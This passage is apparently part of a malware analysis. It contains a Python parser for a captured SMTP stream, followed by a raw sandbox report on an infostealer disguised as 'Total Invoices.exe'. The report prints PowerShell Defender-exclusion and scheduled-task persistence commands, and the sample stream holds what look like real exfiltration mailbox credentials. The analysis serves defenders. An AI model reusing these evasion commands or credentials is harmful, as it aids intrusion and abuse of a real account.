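def _b64(text):
    return base64.b64encode(text.encode()).decode("ascii")


def encode_plain_auth(user, password):
    """RFC 4616 AUTH PLAIN payload: NUL authcid NUL passwd, base64-encoded."""
    return _b64("\x00" + user + "\x00" + password)


# Constructed client-side stream; server replies are not needed here.
SAMPLE_CLIENT_STREAM = (
    "EHLO DESKTOP-TEST\r\n"
    "AUTH LOGIN\r\n"
    + _b64("design@unitechautomations.com") + "\r\n"
    + _b64("Unitech@123") + "\r\n"
    + "MAIL FROM:<design@unitechautomations.com>\r\n"
    "RCPT TO:<design@unitechautomations.com>\r\n"
    "DATA\r\n"
    "From: design@unitechautomations.com\r\n"
    "To: design@unitechautomations.com\r\n"
    "Subject: user/DESKTOP-TEST\r\n"
    "\r\n"
    "Time: 04/24/2024 03:17:06\r\n"
    ".\r\n"
    "QUIT\r\n"
)


def _decode(b64text):
    try:
        return base64.b64decode(b64text.strip(), validate=True).decode("utf-8", "replace")
    except ValueError:
        return None


def _strip_angle(rest):
    return rest.strip().split(" ")[0].strip("<>")


def _apply_plain(out, b64text):
    parts = (_decode(b64text) or "").split("\x00")
    if len(parts) == 3:
        out["auth_user"], out["auth_pass"] = parts[1], parts[2]


def parse_smtp_client(stream):
    out = {"ehlo": None, "auth_method": None, "auth_user": None, "auth_pass": None,
           "mail_from": None, "rcpt_to": [], "subject": None, "starttls": False}
    expect = []        # base64 continuation lines still owed by a multi-step AUTH
    in_data = False
    for line in stream.split("\r\n"):
        if in_data:                      # message body until the lone "."
            if line == ".":
                in_data = False
            elif out["subject"] is None and line.lower().startswith("subject:"):
                out["subject"] = line[8:].strip()
            continue
        if expect:
            if not line:
                continue
            what = expect.pop(0)
            if what == "plain":
                _apply_plain(out, line)
            else:
                out[what] = _decode(line)
            continue
        upper = line.upper()
        if upper.startswith(("EHLO ", "HELO ")):
            out["ehlo"] = line[5:].strip()
        elif upper == "STARTTLS":        # everything after this is encrypted
            out["starttls"] = True
            break
        elif upper.startswith("AUTH LOGIN"):
            out["auth_method"] = "LOGIN"
            initial = line[10:].strip()  # optional initial response = username
            if initial:
                out["auth_user"] = _decode(initial)
                expect = ["auth_pass"]
            else:
                expect = ["auth_user", "auth_pass"]
        elif upper.startswith("AUTH PLAIN"):
            out["auth_method"] = "PLAIN"
            initial = line[10:].strip()
            if initial:
                _apply_plain(out, initial)
            else:
                expect = ["plain"]
        elif upper.startswith("MAIL FROM:"):
            out["mail_from"] = _strip_angle(line[10:])
        elif upper.startswith("RCPT TO:"):
            out["rcpt_to"].append(_strip_angle(line[8:]))
        elif upper == "DATA":
            in_data = True
    return out


def matches_config(parsed, config):
    """True when the sniffed credentials are the ones in the extracted config."""
    return (parsed["auth_user"] == config.get("Username")
            and parsed["auth_pass"] == config.get("Password"))


if __name__ == "__main__":
    parsed = parse_smtp_client(SAMPLE_CLIENT_STREAM)
    for key, value in parsed.items():
        print("%-12s %s" % (key, value))
    print("matches extracted config:", matches_config(parsed, EXTRACTED_CONFIG))
```

To use it on the real capture, follow one of the two TCP streams in Wireshark, save the client-to-server direction as raw text and feed it to `parse_smtp_client`; a `starttls` of True tells you the plaintext ends there and the credentials have to come from the memory dump instead.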
Source: RegSvcs.exe, 00000008.00000002.1804990629.00000000030BA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2882242292.0000000002899000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://mail.unitechautomations.com
Source: Total Invoices.exe, 00000000.00000002.1730336857.000000000335C000.00000004.00000800.00020000.00000000.sdmp, dWXyZYb.exe, 00000009.00000002.1825169792.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Total Invoices.exe, dWXyZYb.exe.0.dr; String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fonts.com
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Total Invoices.exe, 00000000.00000002.1735865381.0000000005B39000.00000004.00000020.00020000.00000000.sdmp, Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sakkal.com
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.tiro.com
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.typography.netD
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: Total Invoices.exe, 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dWXyZYb.exe, 00000009.00000002.1833905348.000000000401A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://account.dyn.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, cPKWk.cs; .Net Code: MPvOvSMQSR

                      System Summary

                      barindex
                      Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Total Invoices.exe.4ebf748.10.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.dWXyZYb.exe.4055278.10.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Total Invoices.exe.4efa768.11.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.dWXyZYb.exe.401a258.11.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Total Invoices.exe.4efa768.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.dWXyZYb.exe.4055278.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.dWXyZYb.exe.401a258.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Total Invoices.exe.31a42d0.5.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
                      Source: 0.2.Total Invoices.exe.59b0000.13.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
                      Source: initial sampleStatic PE information: Filename: Total Invoices.exe
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_015ED5DC
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_07ADD63F
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_07ADD650
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_07AD4594
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_07ADB5F8
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_07AD43D8
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_07AD22B0
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_07AD22C0
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_07ADB1C0
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_07ADAD88
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_07ADAD70
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_07ADCCA0
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_07ADCC8F
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_0DE438A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016FA49B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016FD668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016F4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016F3EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016F4200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06469DCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06478EDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06473258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06475A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_064742B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06470040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0647C058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0647E068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06475358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0647399B
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_012FD5DC
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_08FC27E0
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_09900818
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_09900B90
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_0990AD88
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_0990CC8F
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_0990CCA0
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_0990B1C0
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_09904298
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_099022B0
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_099042A8
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_099022C0
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_0990B5F8
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_0990D650
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_0990D640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_00E5A3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_00E5D728
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_00E54AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_00E53EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_00E54200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_05D3B65B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_05D39BB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_05D48EDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_05D40040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_05D4E073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_05D442B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_05D43258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_05D45A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_05D439B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_05D45358
Source: Total Invoices.exe, 00000000.00000002.1728355804.000000000136E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Total Invoices.exe
Source: Total Invoices.exe, 00000000.00000002.1730336857.0000000003440000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed04b9152-f33d-48a0-b781-4be8ad9dc338.exe4 vs Total Invoices.exe
Source: Total Invoices.exe, 00000000.00000002.1732168754.0000000004B5E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Total Invoices.exe
Source: Total Invoices.exe, 00000000.00000000.1632814911.0000000000C64000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameaDox.exe6 vs Total Invoices.exe
Source: Total Invoices.exe, 00000000.00000002.1737514998.0000000007E24000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Total Invoices.exe
Source: Total Invoices.exe, 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed04b9152-f33d-48a0-b781-4be8ad9dc338.exe4 vs Total Invoices.exe
Source: Total Invoices.exe, 00000000.00000002.1729679619.0000000003080000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Total Invoices.exe
Source: Total Invoices.exe, 00000000.00000002.1730336857.0000000003181000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Total Invoices.exe
Source: Total Invoices.exe, 00000000.00000002.1735608541.00000000059B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Total Invoices.exe
Source: Total Invoices.exe | Binary or memory string: OriginalFilenameaDox.exe6 vs Total Invoices.exe
Source: Total Invoices.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Total Invoices.exe.4ebf748.10.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.dWXyZYb.exe.4055278.10.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Total Invoices.exe.4efa768.11.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.dWXyZYb.exe.401a258.11.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Total Invoices.exe.4efa768.11.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.dWXyZYb.exe.4055278.10.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.dWXyZYb.exe.401a258.11.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Total Invoices.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dWXyZYb.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, cPs8D.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, 72CF8egH.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, G5CXsdn.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, 3uPsILA6U.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, 6oQOw74dfIt.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, aMIWm.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, 3QjbQ514BDx.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, raMx1YCmhbZF0jKmTA.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, raMx1YCmhbZF0jKmTA.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, F65Zujn1AyWNBvASQN.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, F65Zujn1AyWNBvASQN.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, F65Zujn1AyWNBvASQN.cs | Security API names: _0020.AddAccessRule
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, F65Zujn1AyWNBvASQN.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, F65Zujn1AyWNBvASQN.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, F65Zujn1AyWNBvASQN.cs | Security API names: _0020.AddAccessRule
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, raMx1YCmhbZF0jKmTA.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, raMx1YCmhbZF0jKmTA.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/19@1/1
Source: C:\Users\user\Desktop\Total Invoices.exe | File created: C:\Users\user\AppData\Roaming\dWXyZYb.exe
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Mutant created: \Sessions\1\BaseNamedObjects\sTkHxGUfImc
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
Source: C:\Users\user\Desktop\Total Invoices.exe | File created: C:\Users\user\AppData\Local\Temp\tmp3C54.tmp
Source: Total Invoices.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Total Invoices.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Total Invoices.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Total Invoices.exe | ReversingLabs: Detection: 60%
Source: Total Invoices.exe | Virustotal: Detection: 31%
Source: C:\Users\user\Desktop\Total Invoices.exe | File read: C:\Users\user\Desktop\Total Invoices.exe:Zone.Identifier
Source: unknown | Process created: C:\Users\user\Desktop\Total Invoices.exe "C:\Users\user\Desktop\Total Invoices.exe"
Source: C:\Users\user\Desktop\Total Invoices.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Total Invoices.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dWXyZYb.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Total Invoices.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Total Invoices.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\dWXyZYb.exe C:\Users\user\AppData\Roaming\dWXyZYb.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: windows.storage.dll
